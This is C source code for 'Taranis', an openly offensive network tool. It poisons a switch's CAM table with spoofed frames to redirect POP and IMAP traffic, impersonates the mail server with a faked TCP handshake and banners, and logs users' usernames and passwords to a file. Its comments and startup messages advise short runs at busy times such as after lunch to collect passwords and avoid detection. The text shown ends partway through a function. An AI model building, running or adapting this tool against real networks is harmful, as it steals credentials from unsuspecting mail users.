/*
 * Taranis redirects traffic on a switch and provides fake imap and pop 
 * servers in order to steal passwords.  This is written to demonstrate
 * the absolute necessity of strong authentication.
 *
 * inputs - ip of pop/imap server
 *
 * taranis runs two threads
 *     first  thread - sends spoofed traffic
 *     second thread - fake pop/imap server
 *
 */

/* if someone were to run this program for a few minutes, just after lunch
 * they would likely get a significant number of passwords.
 */

/* First thread
 *
 * continually send packets with:
 *
 * ether dst == local mac address
 * ether src == pop/imap server's mac address
 * other packet characteristics don't matter as this packet_shouldn't_ ever
 * be forwarded by the switch.  Currently an ICMP echo reply packet
 * is sent.
 *
 * this will corrupt the switch's CAM table and will result in traffic 
 * destined for the pop/imap server being redirected to us.
 */

/* Second thread
 *
 * raw ethernet pop/imap server..
 * needs to fake a partial session as if it were the actual destination
 * - read syn
 * - send syn/ack
 * - read ack
 * and then do the protocol specific stuff
 */

/*
 * the pop protocol is insanely simple
 * when the client connects the conversation looks like this:
 * (S == Server C==Client)
 *
 * S:"+OK POP3 server ready CRLF"
 * C:"USER foo CRLF"
 * S:"+OK CRLF"
 * C:"PASS bar CRLF"
 * and we've won.
 */

/*
 * IMAP is even easier
 * 
 * S: + OK EvilServer here
 * C: LOGIN USERNAME PASSWORD
 * and again, we've won at this point
 */

#include <stdio.h>
#include <sys/types.h>

#if HAVE_CONFIG_H
#  include "config.h"
#endif

#if STDC_HEADERS
#  include <stdlib.h>
#  include <string.h>
#elif HAVE_STRINGS_H
#  include <strings.h>
#endif /* STDC_HEADERS */

#if HAVE_UNISTD_H
#  include <unistd.h>
#endif

#ifndef __OpenBSD__
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#endif /* __OpenBSD__ */

#include <pthread.h>

#include <pcap.h>
#include <libnet.h>

#include "taranis.h"

/* Defines */
#define CKSUM_CARRY(x)\
    (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff)) 
#define OSYN 0xdeadbeef

/* Global Variables */
int                    Pcap_media_type;
int                    Pcap_media_offset;
char                  *Interface = NULL;
char                  *Log_file = NULL;
char                   Default_log_file[] = "taranis.log";
struct ether_addr     *My_MAC_addr;
struct ether_addr      Dst_MAC_addr;
u_int32_t              Src_ip;
u_int32_t              Dst_ip;
u_int32_t              Gw_ip;
u_int32_t              Ms_ip;
pthread_t              Spoof_thread;
char                   Default_pop_banner[] = "+OK POP3 Server\r\n";
char                  *Pop_banner = NULL;
char                   Pop_ok[] = "+OK\r\n";
char                   Default_imap_banner[] = "* OK IMAP4rev1 Server\r\n";
char                  *Imap_banner = NULL;
int                    Debug_level = 1;

int
main(int argc, char *argv[])
{
  int                arg;
  char              *sip_addr = "207.46.197.100"; /* random microsoft.com */
  char              *dip_addr = "207.46.230.218"; /* addresses */
  struct ether_addr *e_addr_s;
  struct ether_addr *e_addr_d;
  u_char            *e_char;

  /* libpcap stuff */
  pcap_t            *PD = NULL;
  extern char        pcap_version[];
  char               pcap_errbuf[PCAP_ERRBUF_SIZE];
  char              *pcap_file = NULL;

  printf("[*] Taranis starting ... \n");
  printf("[*] Code by Jonathan Wilkins <jwilkins@bitland.net>\n");
  printf("[*] Original idea by Jesse <jesse@bitland.net>\n");
  printf("[*] Thanks to Skyper <skyper@segfault.net> for all his help\n");
  printf("[*]\n");
  printf("[*] NOTE: Running for extended periods is not advised as no real \n");
  printf("    connections to the target server will be possible.  This will\n");
  printf("    be noticed.  Running for short periods, at high traffic times\n");
  printf("    such as after lunch, is recommended\n");
  printf("[*]\n");
  printf("[*] Using libpcap version %s\n", pcap_version);

  /* seed libnet random number generator */
  libnet_seed_prand();

  /* get command line parameters */
  while((arg = getopt(argc, argv, "I:P:l:s:d:i:m:g:e:h?")) != EOF){
    switch(arg){
      case 'l': /* Specify log file name */
                Log_file = optarg;
                break;
      case 'I': /* Specify IMAP banner */
                Imap_banner = optarg;
                break;
      case 'P': /* Specify POP banner*/
                Pop_banner = optarg;
                break;
      case 'i': /* Specify ethernet interface */
                Interface = optarg;
                break;
      case 'r': /* Read from pcap file */
                pcap_file = optarg;
                break;
      case 's': /* Source Address for spoofed packets */
                sip_addr = optarg;
                break;
      case 'd': /* Destination address for spoofed packets */
                dip_addr = optarg;
                break;
      case 'm': /* POP/IMAP server IP address */
                Ms_ip = inet_addr(optarg);
                break;
      case 'g': /* Gateway address */
                Gw_ip = inet_addr(optarg);
                break;
      case 'e': /* Destination MAC address (either mail server or gateway) */
                memcpy(&Dst_MAC_addr, ether_aton(optarg), 
                       sizeof(struct ether_addr));
                break;
      case 'h':
      case '?': print_usage(argv[0]);
                exit(EXIT_SUCCESS);
                break;
    }
  }

  printf("[*] Spoofing packets from %s to %s\n", sip_addr, dip_addr);
  Src_ip = inet_addr(sip_addr);
  Dst_ip = inet_addr(dip_addr);

  /* Log file stuff */
  if(!Log_file){
    Log_file = Default_log_file;
  }

  /* Banner stuff */
  if(!Pop_banner){
    Pop_banner = Default_pop_banner;
  }
  if(!Imap_banner){
    Imap_banner = Default_imap_banner;
  }

  /* Initialize packet capture */
  if(!Interface){
    Interface = pcap_lookupdev(pcap_errbuf);
    if(!Interface){
      printf("[x] PCAP Error: %s\n", pcap_errbuf);
      exit(EXIT_FAILURE);
    }
  }

  printf("[*] Opening %s\n", Interface);

  if(pcap_file){
    PD = pcap_open_offline(pcap_file, pcap_errbuf);
  } else {
    PD = pcap_open_live(Interface, ETHERSNAPLEN, PROMISC, 1000, pcap_errbuf);
  }
  if(!PD){
    printf("[x] PCAP open error: %s\n", pcap_errbuf);
    exit(EXIT_FAILURE);
  }

  switch((Pcap_media_type = pcap_datalink(PD))){
    case DLT_EN10MB: Pcap_media_offset = 14;
                     printf("[*] Ethernet detected\n");
                     break;
    default:         printf("[x] Unsupported link type\n");
                     exit(EXIT_FAILURE);
                     break;
  }

  /* get our ethernet address */
  My_MAC_addr= get_ether_addr(Interface);
  printf("[*] Ethernet address is %s\n", ether_ntoa(My_MAC_addr));

  printf("[*] Target's ethernet address is %s\n", ether_ntoa(&Dst_MAC_addr));
  printf("[*] Target's IP address is %s\n", ip_ntoa(Ms_ip));

  /* create a thread to send the spoofed packets */
  if(pthread_create(&Spoof_thread, NULL, &spoof, NULL)){
    printf("[x] Couldn't create spoofing thread, giving up...\n");
    return(0);
  }

  while(TRUE){
    pcap_dispatch(PD, 1000, (pcap_handler)capture, 0);
  }

  return(0);
}

/*
 * This function written by skyper@segfault.org
 *
 * calc. checksum WITH carry flag.
 * call cksum = CKSUM_CARRY(sum);
 * we calculate only the initial checksum here.
 * we can use the result for all further packets
 */
int
in_cksum (unsigned short *addr, int len)
{   
    int nleft = len;
    int sum = 0;
    u_short *w = addr;
    u_short answer = 0;

    while (nleft > 1)
    {   
        sum += *w++;
        nleft -= 2;
    }

    if (nleft == 1)             /* padding */
    {   
        *(u_char *) (&answer) = *(u_char *) w;
        sum += answer;
    }

    return (sum);
}

/*
 * based on code from skyper@segfault.com
 * thanks again for the help
 */
u_int16_t
jpw_tcp_cksum(u_char *packet, int len, int offset)
{
  struct pseudoheader  phead;
  int                  cksum_len;
  struct ip           *iph;
  struct tcphdr       *tcph;
  int                  sum = 0;
  int                  tcph_off;

  iph      = (struct ip *)    (packet+offset);
  tcph_off = (offset+(iph->ip_hl * 4));
  tcph     = (struct tcphdr *)(packet+tcph_off);

  cksum_len = (len - tcph_off);

  /* set up the pseudo header */
  phead.sip = iph->ip_src.s_addr;
  phead.dip = iph->ip_dst.s_addr;
  phead.protocol[0] = 0x00;  /* this is IPPROTO_TCP */
  phead.protocol[1] = 0x06;
  phead.len = htons(cksum_len);

  /* start by computing the checksum over the pseudo header */
  sum = in_cksum((u_int16_t *)&phead, sizeof(struct pseudoheader));
  tcph->th_sum = 0;
  /* compute the checksum for the tcp portion of the packet */
  sum += in_cksum((u_int16_t *)&packet[tcph_off], cksum_len);
  
  /* eliminate any carry */
  return(CKSUM_CARRY(sum));
}

void
capture(u_char *par, struct pcap_pkthdr *hdr, u_char *data)
{
  static int      packet_count = 0;
  u_char         *new_packet = NULL;

  packet_count++;

  if(hdr->caplen < Pcap_media_offset){
    printf("[x] short ethernet frame recieved (<%d\n)", Pcap_media_offset);
    return;
  }

  if(hdr->caplen != hdr->len){
    printf("[x] hdr->caplen != hdr->len(%d!=%d)\n", hdr->caplen, hdr->len);
    return;
  }

  /* is this an IP frame */
  if((data[12] == 0x08) && (data[13] == 0x00)){
    if(hdr->caplen < (20+Pcap_media_offset)){ /* too short to be valid */
      printf("[x] short IP frame recieved (<%d\n)", Pcap_media_offset+20);
      return;
    }
    process_ip(data, hdr->caplen);
  }
}

void
process_ip(u_char *packet, int len)
{
  struct ip                  *iph;
  struct tcphdr              *tcph;
  u_char                     *tcpdata;
  int                         tcpdatalen;

  /* capture() checks it's an ip packet */
  /* process_ip() just needs to check it's a tcp packet */
  iph     = (struct ip *)(packet+Pcap_media_offset);
  if(iph->ip_p != IPPROTO_TCP){
    return;
  }

  /* figure out offset into packet data (if there is payload) */
  if(len < (Pcap_media_offset + (iph->ip_hl * 4) + 20)){
    printf("[x] bogus packet (packet should have tcp header, but doesn't)\n");
    return;
  }
  tcph    = (struct tcphdr *)(packet+Pcap_media_offset+(iph->ip_hl * 4));
  if(len < (Pcap_media_offset+(iph->ip_hl*4)+(tcph->th_off*4))){
    printf("[x] bogus packet (packet should have tcp options, but doesn't)\n");
    return;
  }

  tcpdata   =(packet + (Pcap_media_offset+(iph->ip_hl*4)+(tcph->th_off*4)));
  tcpdatalen=(ntohs(iph->ip_len)-((iph->ip_hl*4)+(tcph->th_off*4)));

  /* I'm going to be _really_ cheesy here.. forgive me
   * we can have canned replies for any packet that we expect, we just
   * need to screw with the headers a little.
   */

  /*
   * SYN always causes a SYN/ACK and then a banner packet
   * POP USER always causes an OK packet and we save it
   * POP PASS packet we save
   * IMAP a001 LOGIN packet we save
   */

  /* Check it's a packet destined for the POP or IMAP port */
  if(!((ntohs(tcph->th_dport) == POP_PORT) || 
       (ntohs(tcph->th_dport) == IMAP_PORT))){
    return;
  }

  /* is it a syn */
  if(tcph->th_flags == TH_SYN){
    /* Check it's destined for the server specified on the command line */
    if(iph->ip_dst.s_addr != Ms_ip){
      printf("[x] saw a packet, not for our mail server\n");
      return;
    }

    /* Send SYN/ACK */
    printf("%s is attempting to start a ", ip_ntoa(iph->ip_src.s_addr));
    if(ntohs(tcph->th_dport) == POP_PORT){
      printf("POP session\n");
    } else {
      printf("IMAP session\n");
    }
    printf(" `-> Sending SYN/ACK\n");
    send_synack(packet, len);

    /* wait a few seconds so that the SYN/ACK packet has time to arrive */
    sleep(2);

    /* and send banner packet */
    if(ntohs(tcph->th_dport) == POP_PORT){
      printf(" `-> sending POP banner\n");
      send_pop_banner(packet, len);
    } else {
      printf(" `-> sending IMAP banner\n");
      send_imap_banner(packet, len);
    }
    return;
  }

  /* any other packet with destination port == POP_PORT or IMAP_PORT
   * we parse and write the contents to disk
   */
  if((tcph->th_flags == TH_ACK) || 
     (tcph->th_flags == (TH_PUSH | TH_ACK)) ||
     (tcph->th_flags == 0)){
   
    if(tcph->th_flags == TH_ACK){
      if(Debug_level > 2)
        printf("[process_ip] - ACK      (id %04x)\n", iph->ip_id);
    }
    if(tcph->th_flags == (TH_PUSH | TH_ACK)){
      if(Debug_level > 2)
        printf("[process_ip] - PUSH/ACK (id %04x)\n", iph->ip_id);
    }
    if(tcph->th_flags == 0){
      if(Debug_level > 2)
        printf("[process_ip] - 0        (id %04x)\n", iph->ip_id);
    }
    if(tcpdatalen > 0){
      if(Debug_level > 2)
        printf("[process_ip] - tcpdatalen = %d\n", tcpdatalen);

      save_packet_content(iph->ip_src, iph->ip_dst,
                          tcph->th_sport, tcph->th_dport, 
                          tcpdata, tcpdatalen);
      /* if it's a pop USER command, we send an OK packet */
      if(ntohs(tcph->th_dport) == POP_PORT){
        if(!strncasecmp(tcpdata, "USER", 4)){ 
          send_pop_ok(packet, len);
        } else if(!strncasecmp(tcpdata, "PASS", 4)){ 
          send_rst(packet, len);
        }
      } else if(ntohs(tcph->th_dport) == IMAP_PORT){
        send_rst(packet, len);
      }
    }
  }
}

void
reverse_packet(u_char *packet, int len)
{
  struct ip           *iph;
  struct tcphdr       *tcph;
  u_int16_t            tmp_port;
  u_int32_t            tmp_ip;
  u_char               tmp_ether[6];

  /* reverse ethernet addresses */
  memcpy(tmp_ether, &packet[0], 6);
  memcpy(&packet[0], &packet[6], 6);
  memcpy(&packet[6], tmp_ether, 6);

  /* reverse IPs */
  iph = (struct ip *)(packet+Pcap_media_offset);
  tmp_ip = iph->ip_src.s_addr;
  iph->ip_src = iph->ip_dst;
  iph->ip_dst.s_addr = tmp_ip;

  /* reverse ports */
  tcph    = (struct tcphdr *)(packet+Pcap_media_offset+(iph->ip_hl * 4));
  tmp_port = tcph->th_sport;
  tcph->th_sport = tcph->th_dport;
  tcph->th_dport = tmp_port;

}

void
send_synack(u_char *packet, int len)
{
  u_char              *reply_packet;
  struct ip           *iph;
  struct tcphdr       *tcph;
  u_int32_t            tmp_int;
  u_int16_t            random1;
  u_int16_t            tcph_off;
  int                  x;
  int                  tcp_options_start, tcp_options_len;

  reply_packet = (u_char *)calloc(1, len);
  memcpy(reply_packet, packet, len);

  iph  = (struct ip *)    (reply_packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(reply_packet+Pcap_media_offset+(iph->ip_hl * 4));
  tcph_off = (Pcap_media_offset+(iph->ip_hl * 4));

  /* point it in the right direction */
  reverse_packet(reply_packet, len);

  /* increment syn # */
  tmp_int = ntohl(tcph->th_seq);
  tmp_int++;
  tcph->th_ack = htonl(tmp_int);

  /* make up an syn number */
  tcph->th_seq = htonl(OSYN);

  /* and an IP ID */
  random1 = libnet_get_prand(LIBNET_PRu16);
  iph->ip_id = htons(random1);

  /* and turn on ACK flag */
  tcph->th_flags |= TH_ACK;

  iph->ip_sum = 0;
  tcph->th_sum = 0;

  /* compute checksums */
  if(libnet_do_checksum(reply_packet + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  /* tcp checksum is computed over header + data */
  tcph->th_sum = jpw_tcp_cksum(reply_packet, len, Pcap_media_offset);

  /* send it */
  send_packet(reply_packet, len);

  /* free it */
  free(reply_packet);
  reply_packet = NULL;
}

void
send_rst(u_char *packet, int len)
{
  u_char              *reply_packet;
  struct ip           *iph;
  struct tcphdr       *tcph;
  u_int32_t            tmp_int;
  u_int16_t            random1;
  u_int16_t            tcph_off;
  int                  x;
  int                  tcp_options_start, tcp_options_len;

  reply_packet = (u_char *)calloc(1, len);
  memcpy(reply_packet, packet, len);

  iph  = (struct ip *)    (reply_packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(reply_packet+Pcap_media_offset+(iph->ip_hl * 4));
  tcph_off = (Pcap_media_offset+(iph->ip_hl * 4));

  /* point it in the right direction */
  reverse_packet(reply_packet, len);

  /* increment syn # */
  tmp_int = ntohl(tcph->th_seq);
  tmp_int++;
  tcph->th_seq = tcph->th_ack;
  tcph->th_ack = 0;


  /* and an IP ID */
  random1 = libnet_get_prand(LIBNET_PRu16);
  iph->ip_id = htons(random1);

  /* and turn on ACK flag */
  tcph->th_flags = TH_RST;

  iph->ip_sum = 0;
  tcph->th_sum = 0;

  /* compute checksums */
  if(libnet_do_checksum(reply_packet + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  /* tcp checksum is computed over header + data */
  tcph->th_sum = jpw_tcp_cksum(reply_packet, len, Pcap_media_offset);

  /* send it */
  send_packet(reply_packet, len);

  /* free it */
  free(reply_packet);
  reply_packet = NULL;
}

void
send_packet(u_char *packet, int len)
{
  int                      bytes_sent;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;

  /* if no interface is specified, figure it out */
  if(Interface){
    libnet_device = (u_char *)Interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* send the packet */
  bytes_sent=libnet_write_link_layer(libnet_iface, libnet_device, packet, len);
  if(bytes_sent < len){
    libnet_error(LN_ERR_WARNING, "libnet_write_link_layer send incomplete\n");
  } 

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }
}

void
save_packet_content(struct in_addr sip, struct in_addr dip, 
                    u_int16_t sp, u_int16_t dp,
                    u_char *data, int len)
{
  FILE *log;

  log = fopen(Log_file, "a+");
  if(!log){
    printf("[x] Unable to open log file\n");
    return;
  }

  if(Debug_level > 2)
    printf("[save_packet_content] - len is %d\n", len);
  fprintf(log, "%s:%d",      inet_ntoa(sip), ntohs(sp));
  fprintf(log, "->%s:%d : ", inet_ntoa(dip), ntohs(dp));
  fwrite(data, len, 1, log);
  fprintf(log, "\n");

  fclose(log);
}

void
send_pop_banner(u_char *packet, int len)
{
  u_char              *new_packet;
  int                  new_packet_len;
  struct ip           *iph;
  struct tcphdr       *tcph;
  u_int32_t            tmp_int;
  u_int16_t            random1;
  u_int16_t            tmp_short;
  int                  x;
  int                  tcp_options_start, tcp_options_len;
  int                  header_len;

  iph  = (struct ip *)(packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(packet+Pcap_media_offset+(iph->ip_hl * 4));

  header_len = (Pcap_media_offset + (iph->ip_hl*4) + (tcph->th_off*4));

  new_packet_len = (header_len + strlen(Pop_banner));
  new_packet = (u_char *)calloc(1, new_packet_len);
  memcpy(new_packet, packet, header_len);
  memcpy(&new_packet[header_len], Pop_banner, strlen(Pop_banner));

  iph  = (struct ip *)(new_packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));

  /* point it back */
  reverse_packet(new_packet, new_packet_len);

  /* reset packet size */
  tmp_short = ntohs(iph->ip_len);
  tmp_short += strlen(Pop_banner);
  iph->ip_len = htons(tmp_short);

  /* increment seq # */
  tmp_int = ntohl(tcph->th_seq);
  tmp_int += 1;
  tcph->th_ack = htonl(tmp_int);

  /* increment our sequence number */
  tcph->th_seq = ntohl(OSYN + 1);

  /* make up an IP ID */
  random1 = libnet_get_prand(LIBNET_PRu16);
  iph->ip_id = htons(random1);

  /* and turn on appropriate flags */
  tcph->th_flags = TH_ACK | TH_PUSH;

  /* make tcp options all NOPs */
  tcp_options_start = (Pcap_media_offset + (iph->ip_hl * 4) + 20);
  tcp_options_len   = ((tcph->th_off * 4) - 20);
  for(x=0;x<tcp_options_len;x++){
    new_packet[tcp_options_start + x] = 0x01;
  }
  /* mark end of options */
  new_packet[tcp_options_start + tcp_options_len - 1] = 0x00;

  iph->ip_sum = 0;
  tcph->th_sum = 0;

  /* compute checksums */
  if(libnet_do_checksum(new_packet+LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H)==-1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  /* tcp checksum is computed over header + data */
  tcph->th_sum = jpw_tcp_cksum(new_packet, new_packet_len, Pcap_media_offset);

  send_packet(new_packet, new_packet_len);

  /* free packet */
  free(new_packet);
  new_packet = NULL;
}

void
send_pop_ok(u_char *packet, int len)
{
  u_char              *new_packet;
  int                  new_packet_len;
  struct ip           *iph;
  struct tcphdr       *tcph;
  u_int32_t            tmp_int;
  u_int32_t            tmp_ack;
  u_int16_t            random1;
  u_int16_t            tmp_short;
  int                  x, tcp_options_start, tcp_options_len;
  int                  header_len;
  int                  data_len;

  iph  = (struct ip *)(packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(packet+Pcap_media_offset+(iph->ip_hl * 4));

  header_len = (Pcap_media_offset + (iph->ip_hl*4) + (tcph->th_off*4));
  if(Debug_level > 2)
    printf("[send_pop_ok] header_len is %d\n", header_len);

  data_len = (len - header_len);

  new_packet_len = (header_len + sizeof(Pop_ok) - 1);
  new_packet = (u_char *)calloc(1, new_packet_len);
  memcpy(new_packet, packet, header_len);
  memcpy(&new_packet[header_len], Pop_ok, sizeof(Pop_ok)-1);
  if(Debug_level > 2)
    printf("[send_pop_ok] new_packet_len is %d\n", new_packet_len);

  iph  = (struct ip *)(new_packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));

  /* point it back */
  reverse_packet(new_packet, new_packet_len);

  /* reset packet size */
  tmp_short = (header_len - 14);
  tmp_short += strlen(Pop_ok);
  iph->ip_len = htons(tmp_short);

  /* adjust sequence # and ack # */
  tmp_int = ntohl(tcph->th_seq);
  tmp_int += data_len;
  tmp_ack = tcph->th_ack;
  tcph->th_ack = htonl(tmp_int);
  tcph->th_seq = tmp_ack;

  /* make up an IP ID */
  random1 = libnet_get_prand(LIBNET_PRu16);
  iph->ip_id = htons(random1);

  /* and turn on appropriate flags */
  tcph->th_flags = TH_ACK | TH_PUSH;

  /* make tcp options all NOPs */
  tcp_options_start = (Pcap_media_offset + (iph->ip_hl * 4) + 20);
  tcp_options_len   = ((tcph->th_off * 4) - 20);
  for(x=0;x<tcp_options_len;x++){
    new_packet[tcp_options_start + x] = 0x01;
  }
  /* mark end of options */
  new_packet[tcp_options_start + tcp_options_len - 1] = 0x00;

  iph->ip_sum = 0;
  tcph->th_sum = 0;

  /* compute checksums */
  if(libnet_do_checksum(new_packet+LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H)==-1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  /* tcp checksum is computed over header + data */
  tcph->th_sum = jpw_tcp_cksum(new_packet, new_packet_len, Pcap_media_offset);

  send_packet(new_packet, new_packet_len);

  /* free packet */
  free(new_packet);
  new_packet = NULL;
}

void
send_imap_banner(u_char *packet, int len)
{
  u_char              *new_packet;
  int                  new_packet_len;
  struct ip           *iph;
  struct tcphdr       *tcph;
  u_int32_t            tmp_int;
  u_int16_t            random1;
  u_int16_t            tmp_short;
  int                  x, tcp_options_start, tcp_options_len;

  new_packet_len = len + strlen(Imap_banner);
  new_packet = (u_char *)calloc(1, new_packet_len);
  memcpy(new_packet, packet, len);
  memcpy(&new_packet[len], Imap_banner, strlen(Imap_banner));

  iph  = (struct ip *)(new_packet+Pcap_media_offset);
  tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));

  /* point it back */
  reverse_packet(new_packet, new_packet_len);

  /* reset packet size */
  tmp_short = ntohs(iph->ip_len);
  tmp_short += strlen(Imap_banner);
  iph->ip_len = htons(tmp_short);

  /* increment seq # */
  tmp_int = ntohl(tcph->th_seq);
  tmp_int += 1;
  tcph->th_ack = htonl(tmp_int);

  /* increment our sequence number */
  tcph->th_seq = ntohl(OSYN + 1);

  /* make up an IP ID */
  random1 = libnet_get_prand(LIBNET_PRu16);
  iph->ip_id = htons(random1);

  /* and turn on appropriate flags */
  tcph->th_flags = TH_ACK | TH_PUSH;

  /* make tcp options all NOPs */
  tcp_options_start = (Pcap_media_offset + (iph->ip_hl * 4) + 20);
  tcp_options_len   = ((tcph->th_off * 4) - 20);
  for(x=0;x<tcp_options_len;x++){
    new_packet[tcp_options_start + x] = 0x01;
  }

  iph->ip_sum = 0;
  tcph->th_sum = 0;

  /* compute checksums */
  if(libnet_do_checksum(new_packet+LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H)==-1){
    libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
  }
  /* tcp checksum is computed over header + data */
  tcph->th_sum = jpw_tcp_cksum(new_packet, new_packet_len, Pcap_media_offset);

  send_packet(new_packet, new_packet_len);

  /* free packet */
  free(new_packet);
  new_packet = NULL;
}

void
print_usage(char *name)
{
  printf("Usage %s [OPTIONS]\n", name);
  printf("  -h\t\tPrint this help message\n");
  printf("  -?\t\tPrint this help message\n");
  printf("  -i\t\tSpecify interface name\n");
  printf("  -r\t\tRead from a pcap file (testing only)\n");
  printf("  -s\t\tspecify source ip address for spoofed packets\n");
  printf("  -d\t\tspecify destination ip address for spoofed packets\n");
  /* printf("  -g\t\tgateway ip address\n"); */
  printf("  -m\t\tip address of mail server (required)\n");
  printf("  -l\t\tfile name for log\n");
  printf("  -e\t\tethernet address of mail server (required)\n");
  printf("  -P\t\tspecify POP banner to send to clients\n");
  printf("  -I\t\tspecify IMAP banner to send to clients\n");
  printf("Example:\n");
  printf("./%s -m 10.0.0.90 -e 00:a0:cc:3b:af:bd\n", name);
}

/* Convert an ip address to a string */
char *
ip_ntoa(unsigned long ip)
{
  u_char     *b;
  static char buf[16];

  b = (u_char *)&ip;
  snprintf(buf, sizeof(buf), "%d.%d.%d.%d", b[0], b[1], b[2], b[3]);

  return(buf);
}

/* Convert an ethernet address to a string */
char *
ether_ntoa(struct ether_addr *addr)
{
  u_char     *b;
  static char buf[18];

  b = (u_char *)addr;
  snprintf(buf, sizeof(buf), "%02X:%02X:%02X:%02X:%02X:%02X",
           b[0], b[1], b[2], b[3], b[4], b[5]);

  return(buf);
}

/* convert a string to an ether_addr */
struct ether_addr *
ether_aton(char *addr)
{
  static struct ether_addr e_addr;
  u_char                  *e_char;
  char                     c;
  int                      x;
  int                      y;

  if(strlen(addr) != 17){
    printf("[x] wrong size string passed to ether_aton\n");
    return(NULL);
  }

  e_char = (u_char *)&e_addr;
  for(x=0, y=0;x<6;x++, y+=3){
    switch(addr[y]){
      case('0'): c = 0;     break;
      case('1'): c = 16*1;  break;
      case('2'): c = 16*2;  break;
      case('3'): c = 16*3;  break;
      case('4'): c = 16*4;  break;
      case('5'): c = 16*5;  break;
      case('6'): c = 16*6;  break;
      case('7'): c = 16*7;  break;
      case('8'): c = 16*8;  break;
      case('9'): c = 16*9;  break;
      case('A'):
      case('a'): c = 16*10; break;
      case('B'):
      case('b'): c = 16*11; break;
      case('C'):
      case('c'): c = 16*12; break;
      case('D'):
      case('d'): c = 16*13; break;
      case('E'):
      case('e'): c = 16*14; break;
      case('F'):
      case('f'): c = 16*15; break;
      default:
               printf("[x] invalid character in ether_aton()\n");
               return(NULL);
    }
    switch(addr[y+1]){
      case('0'): c += 0;     break;
      case('1'): c += 1;  break;
      case('2'): c += 2;  break;
      case('3'): c += 3;  break;
      case('4'): c += 4;  break;
      case('5'): c += 5;  break;
      case('6'): c += 6;  break;
      case('7'): c += 7;  break;
      case('8'): c += 8;  break;
      case('9'): c += 9;  break;
      case('A'):
      case('a'): c += 10; break;
      case('B'):
      case('b'): c += 11; break;
      case('C'):
      case('c'): c += 12; break;
      case('D'):
      case('d'): c += 13; break;
      case('E'):
      case('e'): c += 14; break;
      case('F'):
      case('f'): c += 15; break;
      default:
               printf("[x] invalid character in ether_aton()\n");
               return(NULL);
    }
    e_char[x] = c;
  }

  return(&e_addr);
}

struct ether_addr *
get_remote_ether_addr(u_int32_t *ip)
{
  static struct ether_addr e_addr;

  /* send arp request */
  /* wait for arp reply */
  /* if we don't get anything back, presume that it's not on the local net */
  /* copy source ether addr to e_addr */

  return(&e_addr);
}

struct ether_addr *
get_ether_addr(char *interface)
{
  u_char                      *libnet_device = NULL;
  struct libnet_link_int      *libnet_iface = NULL;
  char                         libnet_errbuf[LIBNET_ERRBUF_SIZE];
  static struct ether_addr    *e_addr;
  struct sockaddr_in           sin;

  /* if no interface is specified, figure it out */
  if(interface){
    libnet_device = (u_char *)interface;
  } else {
    if(libnet_select_device(&sin, &libnet_device, libnet_errbuf) == -1){
      libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n");
    }
  }

  /* open the interface */
  if(!(libnet_iface=libnet_open_link_interface(libnet_device, libnet_errbuf))){
    libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface failed: %s\n");
  }

  /* get our ethernet address */
  e_addr = libnet_get_hwaddr(libnet_iface, libnet_device,  libnet_errbuf);
  if(!e_addr){
    libnet_error(LIBNET_ERR_FATAL, "libnet_get_hwaddr failed: %s\n");
  }

  /* close interface */
  if(libnet_close_link_interface(libnet_iface) == -1){
    libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close");
  }

  return(e_addr);
}

void *
spoof(void *arg)
{
  while(TRUE){
    usleep(100);
    send_icmp_reply(Src_ip, Dst_ip, &Dst_MAC_addr);
  }
  return(0);
}

void
send_icmp_request(u_int32_t sip, u_int32_t dip, 
                  struct ether_addr *e_src, struct ether_addr *e_dst)
{
  int                      icmp_packet_size;
  int                      bytes_sent;
  u_char                  *icmp_packet = NULL;
  u_char                  *libnet_device = NULL;
  struct libnet_link_int  *libnet_iface = NULL;
  char                     libnet_errbuf[LIBNET_ERRBUF_SIZE];
  struct sockaddr_in       sin;
  int                      random1, random2;
  u_char                   icmp_payload[] =
             "\x68\x8b\x2f\x3b\xf5\x30\x0e\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
             "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
             "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
             "\x30\x31\x32\x33\x34\x35\x36\x37";
  u_char                  *icmp_payload_p;
  int                      icmp_payload_size;
  u_char                  *e_char;

  /* seed random number generator and get some values for later */
  random1 = libnet_get_prand(LIBNET_PRu16);
